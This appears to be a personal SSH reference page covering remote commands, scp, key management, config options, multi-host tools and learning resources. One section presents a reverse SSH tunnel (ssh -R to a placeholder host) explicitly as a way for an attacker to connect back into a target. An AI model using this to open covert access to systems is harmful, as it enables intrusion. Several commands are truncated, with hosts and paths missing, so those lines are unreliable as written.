Secure Shell

Table of Contents#

Commands Reference#

Remote Ops#

ssh “secure shell”


  • -R enables remote port forwarding


Run command ps on the remote machine myserver.

ssh myserver ps
ssh username@myserver ps       # specify user name
ssh -l username myserver ps    # specify user name
ssh -p 22 myserver ps          # specify port number
ssh myserver ps > /tmp/ps.out  # redirect the output to a file on your local system
ssh myserver ps \> /tmp/ps.out # redirect the output to a file on the remote system


Run a script remotely.

ssh myserver bash < ./


test version with leading echo

for node in web-server{00..09}; do
  echo ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'

ready version

for node in web-server{00..09}; do
  ssh $node 'echo -e "$HOSTNAME\t$(date "+%F") $(uptime)"'


wait for a reboot

until ssh user@; do sleep 3; done


reverse SSH connection

  • 12345 is the port number that the remote system (the attacker) will use to SSH back into the target

  • localhost:22 specifies the port number that the target system will listen on to receive a connection

ssh -R 12345:localhost:22 user@remoteipaddress
ssh localhost -p 12345 # setup a reverse connection from the attacker system after the target has connected

scp “secure copy”


Upload the file some_system.tar.gz to the home directory of user bob on remote system

scp some_system.tar.gz bob@

sftp “secure file transfer protocol”

Key Management#

  • ssh-add

    • ssh-add --apple-use-keychain ~/.ssh/id_ed25519

    • ssh-add -l list private keys currently accessible to ssh-agent

  • ssh-keysign

  • ssh-keyscan

  • ssh-keygen

    • ssh-keygen -f ~/.ssh/id_ed25519 -t ed25519 -C ""


  • sshd

  • sftp-server

  • ssh-agent

    • eval "$(ssh-agent -s)"

    • echo $SSH_AGENT_PID

    • echo $SSH_AUTH_SOCK


  • ssh-copy-id -i ~/.ssh/id_ed25519 user@host

OpenSSH Files




  AddKeysToAgent yes
  IdentityFile   ~/.ssh/id_ed25519
  UseKeychain    yes
  User           git


[ h ][ w ] OpenSSH


  • clusterssh - Written in Perl, it opens a bunch of unmanaged terminals in windows.

  • mssh (MultiSSH) - GTK+–based multi-SSH client in a single GUI window.

  • mussh - MUltihost SSH Wrapper shell script.

  • pconsole - Intended for tiling window managers, spawns a terminal per host.

  • multixterm - Written in Expect & Tk, drives multiple xterms.

  • PAC Manager - A Perl SecureCRT-like GUI on Linux.



Akamai Developer

  • [ y ] 02-23-2022. “How to use Multiple SSH Keys | Managing Different SSH Keys on your System”.

  • [ y ] 10-27-2021. “SSH Key Authentication | How to Create SSH Key Pairs”.


  • [ y ] 02-07-2023. “Linux Crash Course - Connecting to Linux Servers via SSH”.

  • [ y ] 11-14-2022. “5 Must Have Tweaks to Secure OpenSSH”.

  • [ y ] 03-23-2022. “Speed Up Your SSH Sessions with These Seven Quick SSH Config Tricks”.

  • [ y ] 01-10-2022. “Getting Started with OpenSSH Key Management”.

  • [ y ] 11-18-2021. “The OpenSSH Client Config File: Simplify your SSH Connections”.

  • [ y ] 12-18-2020. “SSH Full Course - EVERYTHING You Need to Know!”.

  • [ y ] 10-21-2019. “Linux Commands for Beginners 22 - Remote Management with OpenSSH”.


  • [ y ] 01-31-2019. Computerphile. “How Secure Shell Works (SSH) - Computerphile”.

  • [ y ] 03-03-2024. Lawrence Systems. “Linux Supply Chain Attack Discovered in SSH CVE-2024-3094”.

  • [ y ] 04-03-2024. Low Level Learning. “revealing the features of the XZ backdoor”.

  • [ y ] 03-11-2020. PowerCert Animated Videos. “Telnet vs SSH Explained”.

  • [ y ] 07-08-2018. Traversy Media. “SSH Crash Course | With Some DevOps”.


  • [ h ] Barrett, Daniel J.; Richard E. Silverman; & Robert G. Byrnes. (2005). SSH The Secure Shell: The Definitive Guide. 2nd Ed. O’Reilly.


  • [ w ] Host Key (authenticates computer)

  • [ w ] Identity Key (authenticates user)

  • [ w ] OpenSSH

  • [ w ] PuTTY

  • [ w ] SFTP Secure File Transfer Protocol

  • [ w ] SSH Secure Shell

  • [ w ] SSH Client

  • [ w ] SSH Server

  • [ w ] Telnet